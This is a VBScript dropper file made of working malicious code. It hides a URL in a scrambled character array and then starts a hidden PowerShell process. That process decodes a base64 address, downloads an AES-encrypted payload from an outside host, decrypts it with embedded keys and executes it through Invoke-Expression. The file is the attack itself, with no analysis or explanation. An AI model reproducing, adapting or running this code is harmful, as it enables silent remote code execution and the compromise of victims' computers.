On Error Resume Next

Dim arr, index, url, i
arr = Array("h", "I", "t", "t", "B", "p", "s", ":", "e", "/", "/", "w", "i", "J", "n", "s", "x", "u", "p", "J", "p", "o", "r", "h", "t", ".", "c", "y", "o", "u", "a", "/", "i", "I", "n", "e", "t", "e", "r", "n", "W", "e", "v", "t", "E", "v", "/", "N", "s", "H", "y", "s", "Z", "t", "e", "n", "m", ".", "p", "N", "h", "R", "p")
index = Array(0, 2, 3, 5, 6, 7, 9, 10, 11, 12, 14, 15, 17, 18, 20, 21, 22, 24, 25, 26, 27, 28, 29, 31, 32, 34, 36, 37, 38, 39, 41, 43, 45, 46, 48, 50, 51, 53, 54, 56, 57, 58, 60, 62)

url = ""
For i = 0 To UBound(index)
    url = url & arr(index(i))
Next

Set x4 = CreateObject("WScript.Shell")

Dim p
p = "powershell -NoProfile -WindowStyle Hidden -Command """
p = p & "$u=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93aW5zdXBwb3J0LmN5b3UvaW50ZXJuZXR2L3N5c3RlbS5waHA='));"
p = p & "$k=[Convert]::FromBase64String('fABIUJmk5jRfJ34QgmCto4cTfXK85QFwjIUZg9MDPaU=');"
p = p & "$i=[Convert]::FromBase64String('xEe1yb/jiDLB8GibT+Tlcg==');"
p = p & "$d=(New-Object Net.WebClient).DownloadData($u + '?action=get_payload&key_id=bc5d6687e2a18653');"
p = p & "$a=New-Object Security.Cryptography.AesManaged;"
p = p & "$a.Mode='CBC';$a.Padding='PKCS7';$a.Key=$k;$a.IV=$i;"
p = p & "$t=$a.CreateDecryptor();"
p = p & "$b=$t.TransformFinalBlock($d,0,$d.Length);"
p = p & "$s=[Text.Encoding]::UTF8.GetString($b);"
p = p & "Invoke-Expression $s;"
p = p & """"

x4.Run p, 0, False

Set x4 = Nothing
